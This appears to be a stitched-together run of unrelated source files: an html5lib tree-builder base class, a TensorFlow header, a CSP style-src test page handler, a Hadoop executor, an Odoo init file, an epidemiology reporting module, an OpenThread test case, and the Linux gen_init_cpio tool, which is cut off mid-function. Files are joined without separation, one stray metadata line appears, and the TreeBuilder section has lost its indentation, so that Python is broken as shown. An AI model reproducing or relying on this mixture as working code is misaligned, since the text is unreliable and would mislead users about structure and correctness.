    def __repr__(self):
        return "<%s>" % (self.name)

    def appendChild(self, node):
        """Insert node as the last child of the current node."""
        raise NotImplementedError

    def insertText(self, data, insertBefore=None):
        """Insert data as text in the current node, positioned before the
        start of node insertBefore or appended to the node's text."""
        raise NotImplementedError

    def insertBefore(self, node, refNode):
        """Insert node as a child of the current node, before refNode in the
        list of child nodes. Raises ValueError if refNode is not a child of
        the current node."""
        raise NotImplementedError

    def removeChild(self, node):
        """Remove node from the children of the current node."""
        raise NotImplementedError

    def reparentChildren(self, newParent):
        """Move all the children of the current node to newParent.

        This is needed so that trees that don't store text as nodes move the
        text in the correct way.
        """
        # XXX - should this method be made more general?
        for child in self.childNodes:
            newParent.appendChild(child)
        self.childNodes = []

    def cloneNode(self):
        """Return a shallow copy of the current node, i.e. a node with the
        same name and attributes but with no parent or child nodes."""
        raise NotImplementedError

    def hasContent(self):
        """Return true if the node has children or text, false otherwise."""
        raise NotImplementedError
class ActiveFormattingElements(list):
    """List of active formatting elements per the HTML5 parsing algorithm."""

    def append(self, node):
        """Append node, enforcing the "Noah's Ark" clause: if three equal
        entries already exist since the last Marker, drop the earliest."""
        if node != Marker:
            seen_equal = 0
            for existing in reversed(self):
                if existing == Marker:
                    break
                if self.nodesEqual(existing, node):
                    seen_equal += 1
                    if seen_equal == 3:
                        self.remove(existing)
                        break
        list.append(self, node)

    def nodesEqual(self, node1, node2):
        """Nodes are equal when both (namespace, name) and attributes match."""
        if node1.nameTuple != node2.nameTuple:
            return False
        if node1.attributes != node2.attributes:
            return False
        return True
class TreeBuilder(object):
"""Base treebuilder implementation
documentClass - the class to use for the bottommost node of a document
elementClass - the class to use for HTML Elements
commentClass - the class to use for comments
doctypeClass - the class to use for doctypes
"""
#Document class
documentClass = None
#The class to use for creating a node
elementClass = None
#The class to use for creating comments
commentClass = None
#The class to use for creating doctypes
doctypeClass = None
#Fragment class
fragmentClass = None
def __init__(self, namespaceHTMLElements):
if namespaceHTMLElements:
self.defaultNamespace = "http://www.w3.org/1999/xhtml"
else:
self.defaultNamespace = None
self.reset()
def reset(self):
self.openElements = []
self.activeFormattingElements = ActiveFormattingElements()
#XXX - rename these to headElement, formElement
self.headPointer = None
self.formPointer = None
self.insertFromTable = False
self.document = self.documentClass()
def elementInScope(self, target, variant=None):
#If we pass a node in we match that. if we pass a string
#match any node with that name
exactNode = hasattr(target, "nameTuple")
listElementsMap = {
None:(scopingElements, False),
"button":(scopingElements | set([(namespaces["html"], "button")]), False),
"list":(scopingElements | set([(namespaces["html"], "ol"),
(namespaces["html"], "ul")]), False),
"table":(set([(namespaces["html"], "html"),
(namespaces["html"], "table")]), False),
"select":(set([(namespaces["html"], "optgroup"),
(namespaces["html"], "option")]), True)
}
listElements, invert = listElementsMap[variant]
for node in reversed(self.openElements):
if (node.name == target and not exactNode or
node == target and exactNode):
return True
elif (invert ^ (node.nameTuple in listElements)):
return False
assert False # We should never reach this point
def reconstructActiveFormattingElements(self):
# Within this algorithm the order of steps described in the
# specification is not quite the same as the order of steps in the
# code. It should still do the same though.
# Step 1: stop the algorithm when there's nothing to do.
if not self.activeFormattingElements:
return
# Step 2 and step 3: we start with the last element. So i is -1.
i = len(self.activeFormattingElements) - 1
entry = self.activeFormattingElements[i]
if entry == Marker or entry in self.openElements:
return
# Step 6
while entry != Marker and entry not in self.openElements:
if i == 0:
#This will be reset to 0 below
i = -1
break
i -= 1
# Step 5: let entry be one earlier in the list.
entry = self.activeFormattingElements[i]
while True:
# Step 7
i += 1
# Step 8
entry = self.activeFormattingElements[i]
clone = entry.cloneNode() #Mainly to get a new copy of the attributes
# Step 9
element = self.insertElement({"type":"StartTag",
"name":clone.name,
"namespace":clone.namespace,
"data":clone.attributes})
# Step 10
self.activeFormattingElements[i] = element
# Step 11
if element == self.activeFormattingElements[-1]:
break
def clearActiveFormattingElements(self):
entry = self.activeFormattingElements.pop()
while self.activeFormattingElements and entry != Marker:
entry = self.activeFormattingElements.pop()
def elementInActiveFormattingElements(self, name):
"""Check if an element exists between the end of the active
formatting elements and the last marker. If it does, return it, else
return false"""
for item in self.activeFormattingElements[::-1]:
# Check for Marker first because if it's a Marker it doesn't have a
# name attribute.
if item == Marker:
break
elif item.name == name:
return item
return False
def insertRoot(self, token):
element = self.createElement(token)
self.openElements.append(element)
self.document.appendChild(element)
def insertDoctype(self, token):
name = token["name"]
publicId = token["publicId"]
systemId = token["systemId"]
doctype = self.doctypeClass(name, publicId, systemId)
self.document.appendChild(doctype)
def insertComment(self, token, parent=None):
if parent is None:
parent = self.openElements[-1]
parent.appendChild(self.commentClass(token["data"]))
def createElement(self, token):
"""Create an element but don't insert it anywhere"""
name = token["name"]
namespace = token.get("namespace", self.defaultNamespace)
element = self.elementClass(name, namespace)
element.attributes = token["data"]
return element
def _getInsertFromTable(self):
return self._insertFromTable
def _setInsertFromTable(self, value):
"""Switch the function used to insert an element from the
normal one to the misnested table one and back again"""
self._insertFromTable = value
if value:
self.insertElement = self.insertElementTable
else:
self.insertElement = self.insertElementNormal
insertFromTable = property(_getInsertFromTable, _setInsertFromTable)
def insertElementNormal(self, token):
name = token["name"]
assert type(name) == unicode, "Element %s not unicode"%name
namespace = token.get("namespace", self.defaultNamespace)
element = self.elementClass(name, namespace)
element.attributes = token["data"]
self.openElements[-1].appendChild(element)
self.openElements.append(element)
return element
def insertElementTable(self, token):
"""Create an element and insert it into the tree"""
element = self.createElement(token)
if self.openElements[-1].name not in tableInsertModeElements:
return self.insertElementNormal(token)
else:
#We should be in the InTable mode. This means we want to do
#special magic element rearranging
parent, insertBefore = self.getTableMisnestedNodePosition()
if insertBefore is None:
parent.appendChild(element)
else:
parent.insertBefore(element, insertBefore)
self.openElements.append(element)
return element
def insertText(self, data, parent=None):
"""Insert text data."""
if parent is None:
parent = self.openElements[-1]
if (not self.insertFromTable or (self.insertFromTable and
self.openElements[-1].name
not in tableInsertModeElements)):
parent.insertText(data)
else:
# We should be in the InTable mode. This means we want to do
# special magic element rearranging
parent, insertBefore = self.getTableMisnestedNodePosition()
parent.insertText(data, insertBefore)
def getTableMisnestedNodePosition(self):
"""Get the foster parent element, and sibling to insert before
(or None) when inserting a misnested table node"""
# The foster parent element is the one which comes before the most
# recently opened table element
# XXX - this is really inelegant
lastTable=None
fosterParent = None
insertBefore = None
for elm in self.openElements[::-1]:
if elm.name == "table":
lastTable = elm
break
if lastTable:
# XXX - we should really check that this parent is actually a
# node here
if lastTable.parent:
fosterParent = lastTable.parent
insertBefore = lastTable
else:
fosterParent = self.openElements[
self.openElements.index(lastTable) - 1]
else:
fosterParent = self.openElements[0]
return fosterParent, insertBefore
def generateImpliedEndTags(self, exclude=None):
name = self.openElements[-1].name
# XXX td, th and tr are not actually needed
if (name in frozenset(("dd", "dt", "li", "option", "optgroup", "p", "rp", "rt"))
and name != exclude):
self.openElements.pop()
# XXX This is not entirely what the specification says. We should
# investigate it more closely.
self.generateImpliedEndTags(exclude)
def getDocument(self):
"Return the final tree"
return self.document
def getFragment(self):
"Return the final fragment"
#assert self.innerHTML
fragment = self.fragmentClass()
self.openElements[0].reparentChildren(fragment)
return fragment
def testSerializer(self, node):
    """Serialize the subtree of node in the format required by unit tests.

    node - the node from which to start serializing

    Concrete tree-builder implementations must override this.
    """
    raise NotImplementedError
/* Copyright 2021 The TensorFlow Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==============================================================================*/
#ifndef TENSORFLOW_C_EXPERIMENTAL_OPS_GEN_MODEL_ARG_SPEC_H_
#define TENSORFLOW_C_EXPERIMENTAL_OPS_GEN_MODEL_ARG_SPEC_H_
#include "tensorflow/c/experimental/ops/gen/model/arg_type.h"
#include "tensorflow/core/framework/op_def.pb.h"
#include "tensorflow/core/platform/types.h"
namespace tensorflow {
namespace generator {
// An input or output argument to an Op.
//
// Essentially, this represents an OpDef::ArgDef and its context within the Op.
// An input or output argument to an Op.
//
// Essentially, this represents an OpDef::ArgDef and its context within the Op.
class ArgSpec {
 public:
  ArgSpec() = default;
  ArgSpec(const ArgSpec& other) = default;

  // Factory helpers recording whether the argument is an input or an output
  // along with its positional index within the OpDef.
  static ArgSpec CreateInput(const OpDef::ArgDef& arg_def, int position);
  static ArgSpec CreateOutput(const OpDef::ArgDef& arg_def, int position);

  const std::string& name() const { return name_; }
  const std::string& description() const { return description_; }
  // Fix: dropped the meaningless top-level `const` on these by-value return
  // types (it has no effect and triggers -Wignored-qualifiers).
  ArgType arg_type() const { return arg_type_; }
  int position() const { return position_; }

 private:
  explicit ArgSpec(const OpDef::ArgDef& arg_def, ArgType arg_type,
                   int position);

  std::string name_;         // Argument name from the ArgDef.
  std::string description_;  // Human-readable description from the ArgDef.
  ArgType arg_type_;         // Type info derived from the ArgDef.
  int position_;             // Index of this argument within the Op.
};
} // namespace generator
} // namespace tensorflow
#endif // TENSORFLOW_C_EXPERIMENTAL_OPS_GEN_MODEL_ARG_SPEC_H_ | c | github | https://github.com/tensorflow/tensorflow | tensorflow/c/experimental/ops/gen/model/arg_spec.h |
def main(request, response):
    """WPT-style handler for the csp_style-src_none test.

    Sends "style-src 'none'" (plus legacy X- header variants) and returns a
    page asserting that external cross-origin, same-origin and inline styles
    are all blocked.
    """
    # Stdlib json replaces the third-party simplejson dependency; decode
    # semantics are identical for this plain config file.
    import json
    # Fix: the original leaked the config file handle (file() never closed).
    with open('config.json') as f:
        s = json.load(f)
    # Cross-origin base URL used for the external stylesheet below.
    # (The original also computed an unused url2 from ports['http'][0].)
    url1 = "http://" + s['host'] + ":" + str(s['ports']['http'][1])
    _CSP = "style-src 'none'"
    response.headers.set("Content-Security-Policy", _CSP)
    response.headers.set("X-Content-Security-Policy", _CSP)
    response.headers.set("X-WebKit-CSP", _CSP)
    return """<!DOCTYPE html>
<!--
Copyright (c) 2013 Intel Corporation.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of works must retain the original copyright notice, this list
of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the original copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of Intel Corporation nor the names of its contributors
may be used to endorse or promote products derived from this work without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY INTEL CORPORATION "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL INTEL CORPORATION BE LIABLE FOR ANY DIRECT,
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Authors:
Hao, Yunfei <yunfeix.hao@intel.com>
-->
<html>
<head>
<title>CSP Test: csp_style-src_none</title>
<link rel="author" title="Intel" href="http://www.intel.com"/>
<link rel="help" href="http://www.w3.org/TR/2012/CR-CSP-20121115/#style-src"/>
<meta name="flags" content=""/>
<meta name="assert" content="style-src 'none'"/>
<meta charset="utf-8"/>
<script src="../resources/testharness.js"></script>
<script src="../resources/testharnessreport.js"></script>
<link rel="stylesheet" type="text/css" href='""" + url1 + """/tests/csp/support/w3c/canvas-index.css'/>
<link rel="stylesheet" type="text/css" href="support/blue-100x100.css"/>
<style>
#test-green {
background-color: green;
}
</style>
</head>
<body>
<div id="log"></div>
<div id="test-blue"></div>
<div id="test-green"></div>
<h3>ext-css:""" + url1 + """/tests/csp/support/w3c/canvas-index.css</h3>
<script>
test(function() {
var div = document.querySelector("h3");
var fix = getComputedStyle(div)["display"];
assert_not_equals(fix, "inline", "style setted incorrectly");
}, document.title + "_blocked_ext");
test(function() {
var div = document.querySelector("#test-blue");
var fix = getComputedStyle(div)["backgroundColor"];
assert_not_equals(fix, "rgb(0, 0, 255)", "style setted incorrectly");
}, document.title + "_blocked_int");
test(function() {
var div = document.querySelector("#test-green");
var fix = getComputedStyle(div)["backgroundColor"];
assert_not_equals(fix, "rgb(0, 128, 0)", "style setted incorrectly");
}, document.title + "_blocked_inline");
</script>
</body>
</html> """
/*
* *
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
* /
*/
package org.apache.hadoop.util.concurrent;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.util.concurrent.RejectedExecutionHandler;
import java.util.concurrent.ScheduledThreadPoolExecutor;
import java.util.concurrent.ThreadFactory;
/** An extension of ScheduledThreadPoolExecutor that provides additional
 * functionality: debug-logs each runnable before execution and routes
 * task throwables through ExecutorHelper after execution. */
public class HadoopScheduledThreadPoolExecutor extends
    ScheduledThreadPoolExecutor {

  private static final Logger LOG = LoggerFactory
      .getLogger(HadoopScheduledThreadPoolExecutor.class);

  /** @param corePoolSize number of threads to keep in the pool. */
  public HadoopScheduledThreadPoolExecutor(int corePoolSize) {
    super(corePoolSize);
  }

  /** As above, with a custom factory for creating worker threads. */
  public HadoopScheduledThreadPoolExecutor(int corePoolSize,
      ThreadFactory threadFactory) {
    super(corePoolSize, threadFactory);
  }

  /** As above, with a handler invoked when execution is rejected. */
  public HadoopScheduledThreadPoolExecutor(int corePoolSize,
      RejectedExecutionHandler handler) {
    super(corePoolSize, handler);
  }

  /** As above, with both a custom thread factory and rejection handler. */
  public HadoopScheduledThreadPoolExecutor(int corePoolSize,
      ThreadFactory threadFactory,
      RejectedExecutionHandler handler) {
    super(corePoolSize, threadFactory, handler);
  }

  // Logs the executing thread and runnable type when debug is enabled.
  @Override
  protected void beforeExecute(Thread t, Runnable r) {
    if (LOG.isDebugEnabled()) {
      LOG.debug("beforeExecute in thread: " + Thread.currentThread()
          .getName() + ", runnable type: " + r.getClass().getName());
    }
  }

  // Delegates to ExecutorHelper so throwables raised by tasks are logged
  // rather than silently swallowed by the pool.
  @Override
  protected void afterExecute(Runnable r, Throwable t) {
    super.afterExecute(r, t);
    ExecutorHelper.logThrowableFromAfterExecute(r, t);
  }
}
# -*- coding: utf-8 -*-
##############################################################################
#
# Author: Stéphane Bidoul
# Copyright (c) 2012 Acsone SA/NV (http://www.acsone.eu)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from . import account_analytic_project_id
from .post_install import set_account_analytic_account_project_id | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# vim: ai ts=4 sts=4 et sw=4 nu
from __future__ import (unicode_literals, absolute_import,
division, print_function)
import logging
import copy
import datetime
from snisi_core.models.Periods import MonthPeriod
# from snisi_core.models.ReportingPeriods import (
# DefaultMonthlyReportingPeriod, DefaultMonthlyExtendedReportingPeriod)
from snisi_core.models.Projects import Cluster
from snisi_core.models.Roles import Role
from snisi_core.models.Reporting import ExpectedReporting, ReportClass
from snisi_epidemiology import get_domain
from snisi_epidemiology.models import EpiWeekPeriod, EpiWeekReportingPeriod
logger = logging.getLogger(__name__)
DOMAIN = get_domain()
logger = logging.getLogger(__name__)
# Module-level ReportClass lookups used by the expected-reporting helpers
# below; presumably get_or_none returns None for a missing slug — verify.
reportcls_epi = ReportClass.get_or_none(slug='epidemio_weekly_routine')
reportcls_epi_agg = ReportClass.get_or_none(
    slug='epidemio_weekly_routine_aggregated')
reportcls_epi_alert = ReportClass.get_or_none(slug='epidemio_alert')
def create_expected_for(period):
    """Create the ExpectedReporting rows for *period* in this domain.

    For a MonthPeriod: one zero-plus alert expectation per eligible member
    of the routine cluster for the following month, plus one weekly routine
    expectation per member for every epi week touching the month.
    Returns the list of newly created ExpectedReporting objects.
    """
    logger.info("Creating ExpectedReporting for {} at {}"
                .format(DOMAIN, period))

    created_list = []

    routine_cluster = Cluster.get_or_none("epidemiology_routine")

    dtc = Role.get_or_none("dtc")
    charge_sis = Role.get_or_none("charge_sis")

    # Template dict; per-entity copies override the relevant keys below.
    expected_dict = {
        'period': None,
        'within_period': False,
        'within_entity': False,
        'reporting_role': dtc,
        'reporting_period': None,
        'extended_reporting_period': None,
        'amount_expected': ExpectedReporting.EXPECTED_SINGLE
    }

    # snisi_reprohealth only work with those periods
    if not period.__class__ == MonthPeriod:
        logger.debug("Period {} is not relevant to {}".format(period, DOMAIN))
        return created_list
    else:
        # create expected Alerts for current month
        current_month = period.following()
        reporting_period = current_month

        for entity in routine_cluster.members(only_active=True):
            # Alerts are only expected at these two entity levels.
            if entity.type.slug not in ('health_center', 'health_district'):
                continue

            edict = copy.copy(expected_dict)
            edict.update({
                'entity': entity,
                'period': current_month,
                'within_period': True,
                'report_class': reportcls_epi_alert,
                'reporting_role': dtc,
                'reporting_period': reporting_period,
                'amount_expected': ExpectedReporting.EXPECTED_ZEROPLUS
            })

            # Reporting-period fields are not part of the lookup key; they
            # are synchronised after get_or_create instead.
            finddict = copy.copy(edict)
            del(finddict['reporting_period'])
            del(finddict['extended_reporting_period'])

            e, created = ExpectedReporting.objects \
                .get_or_create(**finddict)
            if created:
                logger.debug("Created {}".format(e))
                created_list.append(e)
            else:
                logger.debug("Exists already: {}".format(e))
            if e.reporting_period != edict['reporting_period']:
                e.reporting_period = edict['reporting_period']
                e.save()
            if e.extended_reporting_period \
                    != edict['extended_reporting_period']:
                e.extended_reporting_period \
                    = edict['extended_reporting_period']
                e.save()
            if not e.completion_status:
                e.completion_status = ExpectedReporting.COMPLETION_MISSING
                e.save()

        # Routine Weekly reports
        # Sample days 1..28 in 7-day steps; the set() removes duplicate
        # weeks when two sample days land in the same epi week.
        wperiods = list(set([EpiWeekPeriod.find_create_by_date(
            period.start_on + datetime.timedelta(days=d))
            for d in (1, 7, 14, 21, 28)]))

        for wperiod in wperiods:
            logger.info("wperiod")
            logger.info(wperiod)
            reporting_period = EpiWeekReportingPeriod.find_create_by_date(
                wperiod.middle())

            for entity in routine_cluster.members(only_active=True):

                # report class is based on indiv/agg
                reportcls = reportcls_epi \
                    if entity.type.slug == 'health_center' \
                    else reportcls_epi_agg
                reporting_role = dtc \
                    if entity.type.slug == 'health_center' else charge_sis

                edict = copy.copy(expected_dict)
                edict.update({
                    'entity': entity,
                    'period': wperiod,
                    'report_class': reportcls,
                    'reporting_role': reporting_role,
                    'reporting_period': reporting_period
                })

                finddict = copy.copy(edict)
                del(finddict['reporting_period'])
                del(finddict['extended_reporting_period'])

                e, created = ExpectedReporting.objects \
                    .get_or_create(**finddict)
                if created:
                    logger.debug("Created {}".format(e))
                    created_list.append(e)
                else:
                    logger.debug("Exists already: {}".format(e))
                if e.reporting_period != edict['reporting_period']:
                    e.reporting_period = edict['reporting_period']
                    e.save()
                if e.extended_reporting_period \
                        != edict['extended_reporting_period']:
                    e.extended_reporting_period \
                        = edict['extended_reporting_period']
                    e.save()
                if not e.completion_status:
                    e.completion_status = ExpectedReporting.COMPLETION_MISSING
                    e.save()

    return created_list
def report_classes_for(cluster):
    """Return the ReportClass objects this domain handles (cluster unused)."""
    return [reportcls_epi, reportcls_epi_agg]
#!/usr/bin/env python
#
# Copyright (c) 2016, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import unittest
from autothreadharness.harness_case import HarnessCase
class Leader_5_6_6(HarnessCase):
    """Thread certification harness case 5.6.6 with the DUT as Leader."""

    # Role the device under test assumes for this case.
    role = HarnessCase.ROLE_LEADER
    # Harness case identifier ("5 6 6" == case 5.6.6).
    case = '5 6 6'
    # Number of golden (reference) devices the topology requires.
    golden_devices_required = 3

    def on_dialog(self, dialog, title):
        # No harness dialogs need special handling for this case.
        pass
# Allow running this case directly as a unittest script.
if __name__ == '__main__':
    unittest.main()
// SPDX-License-Identifier: GPL-2.0
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <stdbool.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <string.h>
#include <unistd.h>
#include <time.h>
#include <fcntl.h>
#include <errno.h>
#include <ctype.h>
#include <limits.h>
/*
* Original work by Jeff Garzik
*
* External file lists, symlink, pipe and fifo support by Thayne Harbaugh
* Hard link support by Luciano Rocha
*/
#define xstr(s) #s
#define str(s) xstr(s)
#define MIN(a, b) ((a) < (b) ? (a) : (b))
#define CPIO_HDR_LEN 110
#define CPIO_TRAILER "TRAILER!!!"
#define padlen(_off, _align) (((_align) - ((_off) & ((_align) - 1))) % (_align))
/* zero-padding the filename field for data alignment is limited by PATH_MAX */
static char padding[PATH_MAX];
static unsigned int offset;
static unsigned int ino = 721;
static time_t default_mtime;
static bool do_file_mtime;
static bool do_csum = false;
static int outfd = STDOUT_FILENO;
static unsigned int dalign;
struct file_handler {
const char *type;
int (*handler)(const char *line);
};
/* Write name_len bytes of `name` to the archive and advance the running
 * offset. Returns 0 on success, -1 on a short or failed write. */
static int push_buf(const char *name, size_t name_len)
{
	ssize_t written = write(outfd, name, name_len);

	if (written != name_len)
		return -1;
	offset += name_len;
	return 0;
}
/* Emit `padlen` zero bytes. The static padding[] buffer is only PATH_MAX
 * bytes, so larger requests fail (-1); zero-length requests succeed. */
static int push_pad(size_t padlen)
{
	ssize_t written;

	if (padlen == 0)
		return 0;
	if (padlen >= sizeof(padding))
		return -1;
	written = write(outfd, padding, padlen);
	if (written != padlen)
		return -1;
	offset += padlen;
	return 0;
}
/* Write the entry name, then pad so header + name ends on a 4-byte
 * boundary. Returns 0 on success, -1 on write failure. */
static int push_rest(const char *name, size_t name_len)
{
	if (push_buf(name, name_len) < 0)
		return -1;
	return push_pad(padlen(name_len + CPIO_HDR_LEN, 4));
}
/*
 * Emit the "TRAILER!!!" record terminating a newc cpio archive, pad the
 * archive to a 512-byte boundary, and fsync the output.
 * Returns 0 on success, -1 on I/O failure.
 */
static int cpio_trailer(void)
{
	int len;
	unsigned int namesize = sizeof(CPIO_TRAILER);

	len = dprintf(outfd, "%s%08X%08X%08lX%08lX%08X%08lX"
		"%08X%08X%08X%08X%08X%08X%08X",
		do_csum ? "070702" : "070701", /* magic */
		0,			/* ino */
		0,			/* mode */
		(long) 0,		/* uid */
		(long) 0,		/* gid */
		1,			/* nlink */
		(long) 0,		/* mtime */
		0,			/* filesize */
		0,			/* major */
		0,			/* minor */
		0,			/* rmajor */
		0,			/* rminor */
		namesize,		/* namesize */
		0);			/* chksum */
	offset += len;

	if (len != CPIO_HDR_LEN ||
	    push_rest(CPIO_TRAILER, namesize) < 0 ||
	    push_pad(padlen(offset, 512)) < 0)
		return -1;

	/* EINVAL: fd does not support fsync (e.g. a pipe) — not an error. */
	if (fsync(outfd) < 0 && errno != EINVAL)
		return -1;

	return 0;
}
/*
 * Emit a symlink entry: a newc header whose data segment holds the
 * NUL-terminated link target. Returns 0 on success, -1 on I/O failure.
 */
static int cpio_mkslink(const char *name, const char *target,
			unsigned int mode, uid_t uid, gid_t gid)
{
	int len;
	unsigned int namesize, targetsize = strlen(target) + 1;

	/* Archive paths are relative: drop a leading '/'. */
	if (name[0] == '/')
		name++;
	namesize = strlen(name) + 1;
	len = dprintf(outfd, "%s%08X%08X%08lX%08lX%08X%08lX"
		"%08X%08X%08X%08X%08X%08X%08X",
		do_csum ? "070702" : "070701", /* magic */
		ino++,			/* ino */
		S_IFLNK | mode,		/* mode */
		(long) uid,		/* uid */
		(long) gid,		/* gid */
		1,			/* nlink */
		(long) default_mtime,	/* mtime */
		targetsize,		/* filesize */
		3,			/* major */
		1,			/* minor */
		0,			/* rmajor */
		0,			/* rminor */
		namesize,		/* namesize */
		0);			/* chksum */
	offset += len;

	if (len != CPIO_HDR_LEN ||
	    push_buf(name, namesize) < 0 ||
	    push_pad(padlen(offset, 4)) < 0 ||
	    push_buf(target, targetsize) < 0 ||
	    push_pad(padlen(offset, 4)) < 0)
		return -1;
	return 0;
}
/*
 * Parse a "slink <name> <target> <mode> <uid> <gid>" line and emit the
 * corresponding symlink entry. Returns 0 on success, -1 on error.
 */
static int cpio_mkslink_line(const char *line)
{
	char name[PATH_MAX + 1];
	char target[PATH_MAX + 1];
	unsigned int mode;
	int uid;
	int gid;
	int rc = -1;

	if (5 != sscanf(line, "%" str(PATH_MAX) "s %" str(PATH_MAX) "s %o %d %d", name, target, &mode, &uid, &gid)) {
		/* Fix: this parses "slink" lines — the message said "dir". */
		fprintf(stderr, "Unrecognized slink format '%s'", line);
		goto fail;
	}
	rc = cpio_mkslink(name, target, mode, uid, gid);
 fail:
	return rc;
}
/*
 * Emit a data-less entry (dir/pipe/sock). `mode` must already carry the
 * appropriate S_IF* bits. Returns 0 on success, -1 on I/O failure.
 */
static int cpio_mkgeneric(const char *name, unsigned int mode,
			  uid_t uid, gid_t gid)
{
	int len;
	unsigned int namesize;

	/* Archive paths are relative: drop a leading '/'. */
	if (name[0] == '/')
		name++;
	namesize = strlen(name) + 1;
	len = dprintf(outfd, "%s%08X%08X%08lX%08lX%08X%08lX"
		"%08X%08X%08X%08X%08X%08X%08X",
		do_csum ? "070702" : "070701", /* magic */
		ino++,			/* ino */
		mode,			/* mode */
		(long) uid,		/* uid */
		(long) gid,		/* gid */
		2,			/* nlink */
		(long) default_mtime,	/* mtime */
		0,			/* filesize */
		3,			/* major */
		1,			/* minor */
		0,			/* rmajor */
		0,			/* rminor */
		namesize,		/* namesize */
		0);			/* chksum */
	offset += len;

	if (len != CPIO_HDR_LEN ||
	    push_rest(name, namesize) < 0)
		return -1;
	return 0;
}
/* Kinds of data-less entries that share cpio_mkgeneric(). */
enum generic_types {
	GT_DIR,
	GT_PIPE,
	GT_SOCK
};

struct generic_type {
	const char *type;	/* keyword used in the cpio_list file */
	mode_t mode;		/* S_IF* bits OR'ed into the entry mode */
};

static const struct generic_type generic_type_table[] = {
	[GT_DIR] = {
		.type = "dir",
		.mode = S_IFDIR
	},
	[GT_PIPE] = {
		.type = "pipe",
		.mode = S_IFIFO
	},
	[GT_SOCK] = {
		.type = "sock",
		.mode = S_IFSOCK
	}
};
/*
 * Parse "<type> <name> <mode> <uid> <gid>" for dir/pipe/sock entries and
 * emit the entry via cpio_mkgeneric(). Returns 0 on success, -1 on error.
 */
static int cpio_mkgeneric_line(const char *line, enum generic_types gt)
{
	char name[PATH_MAX + 1];
	unsigned int mode;
	int uid;
	int gid;
	int rc = -1;

	if (4 != sscanf(line, "%" str(PATH_MAX) "s %o %d %d", name, &mode, &uid, &gid)) {
		/*
		 * Fix: the format expects the type keyword first and the
		 * offending line second; the arguments were swapped.
		 */
		fprintf(stderr, "Unrecognized %s format '%s'",
			generic_type_table[gt].type, line);
		goto fail;
	}
	mode |= generic_type_table[gt].mode;
	rc = cpio_mkgeneric(name, mode, uid, gid);
 fail:
	return rc;
}
/* "dir" line handler: thin wrapper selecting GT_DIR. */
static int cpio_mkdir_line(const char *line)
{
